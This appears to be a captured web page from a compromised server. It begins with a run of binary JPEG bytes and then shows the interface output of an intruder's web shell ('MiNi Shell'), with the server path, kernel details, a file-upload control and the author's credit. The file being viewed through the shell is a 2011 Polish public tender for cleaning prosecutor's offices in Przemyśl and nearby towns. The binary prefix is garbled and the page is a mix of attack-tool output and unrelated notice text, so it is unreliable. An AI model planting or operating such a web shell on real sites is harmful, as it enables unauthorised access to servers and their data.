JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111117/383516-N-2011.html

<p class="kh_header"><b>Przemyśl: Kompleksowe  sprzątanie pomieszczeń w Prokuraturze Okręgowej  i Rejonowej      w Przemyślu oraz Prokuraturach Rejonowych w Jarosławiu, Przeworsku i Lubaczowie</b><br>
<b>Numer ogłoszenia: 383516 - 2011; data zamieszczenia: 17.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prokuratura Okręgowa , ul. Waygarta 8, 37-700 Przemyśl, woj. podkarpackie, tel. 0-16 678-97-77, faks 0-16 678-85-21.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.prokuratura.przemysl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe  sprzątanie pomieszczeń w Prokuraturze Okręgowej  i Rejonowej      w Przemyślu oraz Prokuraturach Rejonowych w Jarosławiu, Przeworsku i Lubaczowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamówienie publiczne dotyczy usługi kompleksowego sprzątania powierzchni wewnętrznej w:

1.1 Prokuraturze Okręgowej w Przemyślu   z siedzibą przy ul. Waygarta 8;
1.2  Prokuraturze Rejonowej w Przemyślu   z siedzibą przy ul. Waygarta 8 ;
1.3  Prokuraturze Rejonowej w Jarosławiu   z siedzibą przy ul. Jana Pawła II 11 ;
1.4  Prokuraturze Rejonowej w Przeworsku z siedzibą przy ul. Studziańskiej 1a ;
1.5  Prokuraturze Rejonowej w Lubaczowie z siedzibą przy ul. Mickiewicza 24, 

2. Nomenklatura Wspólnego Słownika Zamówień Publicznych kod CPV: 
    90919200-4 (usługi sprzątania biur), 

3. Dokładny opis przedmiotu zamówienia znajduje się w załączniku nr 1 do SIWZ. 

4. Wykonawca odpowiada za przeszkolenie swoich pracowników w zakresie BHP, na własny koszt  wyposaży ich w odzież ochronną i środki ochrony osobistej.
5. Zatrudnieni pracownicy przy wykonywaniu usługi  w Prokuraturze Okręgowej i Rejonowej w Przemyślu mają obowiązek posiadania poświadczenia bezpieczeństwa upoważniającego do  dostępu do informacji niejawnych opatrzonych klauzulą  Zastrzeżone. Zaświadczenia mają być dostarczone 2 dni przed rozpoczęciem wykonywania usługi w prokuraturach j.w.                                   
 6. Brak poświadczeń w wymienionym terminie będzie podstawą do odstąpienia od umowy przez  Zamawiającego . 
7.Wykonawca zapewnia sprzątanie środkami czystości dopuszczonymi do obrotu i stosowania    potrzebnych  do  mycia  i dezynfekowania  wszelkiego rodzaju powierzchni i umożliwiających czyszczenie powierzchni biurowych, łazienek, luster, balustrad.
8. Zamawiający zapewni na czas wykonywania usługi dostęp do wody , energii elektrycznej oraz  udostępni właściwe pomieszczenia dla potrzeb osób wykonujących usługę sprzątania. 
9.Wykonawca może dokonać wizji lokalnej na terenie objętym usługą sprzątania, w tym celu proszę o kontakt z :
Dyr. Admin.-Finan. Prokuratury Okręgowej i Rejonowej w Przemyślu tel. 16/ 676-37-06	
Kierownikiem sekretariatu Prokuratury Rejonowej w Jarosławiu        tel. 16/ 621-21-03,
Kierownikiem sekretariatu Prokuratury Rejonowej w Przeworsku      tel. 16/ 648-77-14,
Kierownikiem sekretariatu Prokuratury Rejonowej w Lubaczowie      tel. 16/ 632-19-75,
10.Zamawiający  nie przewiduje składanie ofert częściowych .
11.Wszystkie informacje przedstawione w SIWZ są   przeznaczone   wyłącznie  do  przygotowania  oferty   i nie   mogą  być   wykorzystywane   w  innym  celu  oraz   udostępniane  osobom  nie   uczestniczącym   w postępowaniu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.92.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu wg wzoru stanowiącego załącznik nr 3 do SIWZ.
W przypadku Wykonawców  wspólnie  ubiegających  się o  udzielenie   zamówienia  niniejszy warunek udziału w postępowaniu Wykonawcy mogą spełniać łącznie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca złoży:
a) oświadczenie o spełnieniu warunków udziału w postępowaniu wg wzoru  stanowiącego załącznik nr 3 do SIWZ,

b) udokumentuje wykonanie  minimum 2  zamówień ,a  w  przypadku  świadczeń  okresowych  lub ciągłych również wykonywanie, usług w zakresie niezbędnym do wykazania spełniania  warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania  ofert albo wniosków o dopuszczenie do udziału  w postępowaniu, a jeżeli  okres prowadzenia  działalności jest krótszy- 
w tym okresie, z podaniem ich wartości,  przedmiotu, dat wykonania  i odbiorców, oraz załączeniem dokumentu  potwierdzającego ,że te dostawy  lub usługi  zostały wykonane lub są wykonywane należycie - potwierdzone przez Zamawiających  na  rzecz, których były wykonane - załącznik  nr 6 do SIWZ . 
W przypadku  Wykonawców   wspólnie  ubiegających się o udzielenie  zamówienia niniejszy warunek   udziału w postępowaniu Wykonawcy mogą spełniać łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca złoży:
oświadczenie o spełnieniu warunków udziału w postępowaniu wg wzoru stanowiącego załącznik nr 3 do SIWZ,
W przypadku Wykonawców  wspólnie  ubiegających się o udzielenie  zamówienia niniejszy warunek udziału w postępowaniu Wykonawcy mogą spełniać łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca złoży:
a)oświadczenie o spełnieniu warunków udziału w postępowaniu wg wzoru stanowiącego załącznik nr 3 do SIWZ,
b) udokumentuje ,że dysponuje osobami , które będą  uczestniczyć 
w wykonywaniu zamówienia , w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, a także zakresu wykonywanych  przez nie czynności  , oraz o podstawie  do dysponowania tymi  osobami. zał. nr 5  do SIWZ.
W przypadku Wykonawców  wspólnie  ubiegających się o udzielenie  zamówienia niniejszy warunek udziału w postępowaniu Wykonawcy mogą spełniać łącznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca złoży :
a) oświadczenie o spełnieniu warunków udziału w postępowaniu wg wzoru  stanowiącego załącznik nr 3 do SIWZ, 
b) udokumentuje posiadanie opłaconej polisy, a w przypadku jej braku innego    dokumentu   potwierdzającego, że wykonawca jest ubezpieczony od   odpowiedzialności cywilnej   w   zakresie  prowadzonej działalności.
W przypadku Wykonawców wspólnie ubiegających się oudzielenie zamówienia     niniejszy warunek udziału w postępowaniu Wykonawcy mogą spełniać łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wymaga się aby   oferta wraz ze  wszystkimi   załącznikami   była podpisana   przez   osoby   uprawnione  do reprezentowania wykonawcy. W sytuacji reprezentowania  wykonawcy przez pełnomocnika  do oferty  winno  być dołączone  pełnomocnictwo w formie oryginału lub notarialnie poświadczonej kopii.
2.  Wykonawcy  mogą wspólnie ubiegać się o udzielenie zamówienia zgodnie z art.23   ustawy Pzp. W takiej  sytuacji   ustanawiają  pełnomocnika  do reprezentowania ich  w postępowaniu o  udzielenie zamówienia publicznego  lub  reprezentowania w  postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.  
Przepisy  dotyczące   wykonawcy  stosuje  się  odpowiedni do wykonawców   wspólnie ubiegających  się  o udzielenie zamówienia  publicznego. Pełnomocnictwo do reprezentowania w postępowaniu  o udzielenie  zamówienia publicznego lub reprezentowania w postępowaniu i zawarcia  umowy w   sprawie zamówienia   Wykonawca składa  w formie oryginału  lub notarialnie poświadczonej kopii.
3. Pełnomocnictwa  sporządzone  w  języku  obcym  Wykonawca składa w raz 
z tłumaczeniem na język polskim przez tłumacza przysięgłego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie :
a)zmiany  danych   związanych z   obsługą  administracyjno-organizacyjną  umowy związana  ze   zmianą  osób  reprezentujących Strony umowy, w sytuacji, kiedy nastąpi zmiana osób mogących składać oświadczenia woli w imieniu prezentowanej Strony; 
b)zmiany harmonogramu ,w sytuacjach szczególnych może nastąpić zmiana harmonogramu  świadczenia  usług sprzątania w poszczególnych jednostkach 
w trakcie obowiązywania  umowy. 
c )zmiany pracownika świadczącego usługę , w tym  przypadku najpóźniej na 2 dni   przed dokonaniem  zmiany wykonawca obowiązany jest  dostarczyć Zamawiającemu  stosowne zgłoszenie wraz z kartą karną pracownika.
d)zmniejszenia  powierzchni  przeznaczonej do sprzątania  w przypadku  likwidacji  jednostek podległych ,  w  razie wystąpienia  takiej sytuacji  wykonawca   po zmniejszeniu powierzchni  sprzątanej wystawia fakturę pomniejszoną  o koszt sprzątania w  jednostce  zlikwidowanej.
e) zmiany stawki podatku od towarów  i usług.
2.Powyższe zmiany wymagają zgody Zamawiającego i Wykonawcy w formie pisemnego aneksu  podpisanego   przez obie  strony pod rygorem nieważności za wyjątkiem  sytuacji opisanej w ust.1  pkt., c .W tym  przypadku   wystarczy zgłoszenie złożone przez Wykonawcę .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.prokuratura.przemysl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Prokuratura Okręgowa w Przemyślu ul.Waygarta 8, 37- 700 Przemyśl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.11.2011 godzina 09:30, miejsce: W  siedzibie  Zamawiającego  na  Biurze  Podawczym Prokuratury Okręgowej  
w Przemyślu, pokój 001 (na parterze), ul. Waygarta, 8 37-700 Przemyśl.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com